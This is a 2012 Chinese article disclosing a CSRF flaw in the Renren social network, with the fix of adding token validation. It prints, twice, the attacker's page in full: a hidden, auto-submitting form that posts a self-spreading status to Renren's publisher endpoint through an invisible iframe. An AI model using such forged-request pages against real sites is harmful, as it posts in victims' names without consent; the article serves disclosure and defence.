人人網(wǎng)CSRF漏洞曝光及修復(fù)方案
發(fā)布時(shí)間:2012-05-17 10:30:10 作者:佚名
我要評(píng)論
CSRF(Cross-site request forgery跨站請(qǐng)求偽造,也被稱成為“one click attack”或者session riding,通常縮寫為CSRF或者XSRF,是一種對(duì)網(wǎng)站的惡意利用。盡管聽起來像跨站腳本(XSS),但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點(diǎn)內(nèi)的信任用戶,而CSRF則通
腳本頁面http://bookman.sinaapp.com/doover.php,訪問該頁面后會(huì)發(fā)送一條狀態(tài)“已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
詳細(xì)說明:
看了下那個(gè)鏈接的源代碼,是通過人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個(gè)參數(shù)content到接口即可。
這個(gè)頁面post的content內(nèi)容就是“已經(jīng)結(jié)束了,這是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛你的說</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
數(shù)字bookman愛你。歡迎訪問“肖寒Bookman”的人人空間。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.dbjr.com.cn value="1"/>
<p>raw: <input type="text" name="content" value="已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>

修復(fù)方案:
人人比我懂的多。以前有次flash的類似的,傳播是站內(nèi)信吧。
補(bǔ)漏洞很簡(jiǎn)單,加一個(gè)token驗(yàn)證即可。
低級(jí)錯(cuò)誤一枚,從網(wǎng)不行啊。
作者 leo108 AND 白熊一枚
詳細(xì)說明:
看了下那個(gè)鏈接的源代碼,是通過人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個(gè)參數(shù)content到接口即可。
這個(gè)頁面post的content內(nèi)容就是“已經(jīng)結(jié)束了,這是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛你的說</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
數(shù)字bookman愛你。歡迎訪問“肖寒Bookman”的人人空間。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.dbjr.com.cn value="1"/>
<p>raw: <input type="text" name="content" value="已經(jīng)結(jié)束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>

修復(fù)方案:
人人比我懂的多。以前有次flash的類似的,傳播是站內(nèi)信吧。
補(bǔ)漏洞很簡(jiǎn)單,加一個(gè)token驗(yàn)證即可。
低級(jí)錯(cuò)誤一枚,從網(wǎng)不行啊。
作者 leo108 AND 白熊一枚
相關(guān)文章

人人網(wǎng) iPhone版 V7.0.0 官方最新版
人人網(wǎng)是一款是基于人人網(wǎng)主體服務(wù)的免費(fèi)應(yīng)用軟件,專門為手機(jī)用戶設(shè)計(jì)。2013-11-26
人人桌面 v4.0 中文綠色免費(fèi)版 幫助用戶更方便的掛人人網(wǎng)的工具
人人網(wǎng)桌面版(原校內(nèi)通)是一款面對(duì)在辦公室上網(wǎng)的白領(lǐng)、學(xué)生,以及人人網(wǎng)忠實(shí)用戶的軟件。具有:人人網(wǎng)新鮮事、好友狀態(tài)實(shí)時(shí)提醒,快速回復(fù);即時(shí)通知收到的留言、評(píng)論、2013-05-24
MAC修改還原工具是吾愛網(wǎng)友開發(fā)的一款能夠隨機(jī)修改網(wǎng)卡物理地址的工具,當(dāng)然了修改后還能進(jìn)行恢復(fù),整個(gè)修改過程不需要重啟修改,實(shí)時(shí)生效2023-08-11HSE365(安全教育平臺(tái)) v3.2.7 安卓版
HSE365在線教育平臺(tái)app是由北京艾普數(shù)智科技有限公司開發(fā)的一款一站式數(shù)字化安全管理服務(wù)平臺(tái),app基于“互聯(lián)網(wǎng)+安全生產(chǎn)”的先進(jìn)思維和技術(shù),旨在實(shí)現(xiàn)“讓安全成為一種習(xí)2025-04-01- Wordpress寫個(gè)人博客的朋友越來越多同時(shí)想把寫的博客文章同步到其他的社交網(wǎng)站上,比如人人網(wǎng),接下來為大家介紹一招,感興趣的你可以參考下哈,或許可以幫助到你2013-03-11

人人網(wǎng)奧運(yùn)屏蔽 關(guān)鍵詞 可以屏蔽奧運(yùn)相關(guān)的關(guān)鍵詞 不喜歡奧運(yùn)的人有福
不喜歡奧運(yùn)的人可以用這個(gè)軟件2012-08-07
人人桌面經(jīng)典版客戶端是人人網(wǎng)推出的官方桌面版客戶端,是人人網(wǎng)的官方增強(qiáng)軟件。人人桌面經(jīng)典版是官方提供的,適合習(xí)慣使用舊版的網(wǎng)友2014-07-02- 人人網(wǎng)簡(jiǎn)稱人人,它讓您更加方便的隨時(shí)隨地的與好友自由溝通。 在溝通的過程中,各位人人網(wǎng)友可千萬別忘了作息時(shí)間哦,下面小編就教你開啟打擾模式設(shè)置2014-08-02
- 人人網(wǎng)是一款很好用的社交平臺(tái)軟件,我們?cè)谑褂萌巳藴贤奶鞎r(shí),如何屏蔽陌生人的消息呢?下面隨小編一起來看下人人屏蔽陌生人消息的具體操作吧。希望此篇教程能對(duì)大家有所2014-08-02
- 我們?cè)谑褂萌巳藴贤奶鞎r(shí),如何屏蔽陌生人的消息呢?這是目前很多的人喜歡問的問題,本文帶來了詳細(xì)的教程2014-08-04






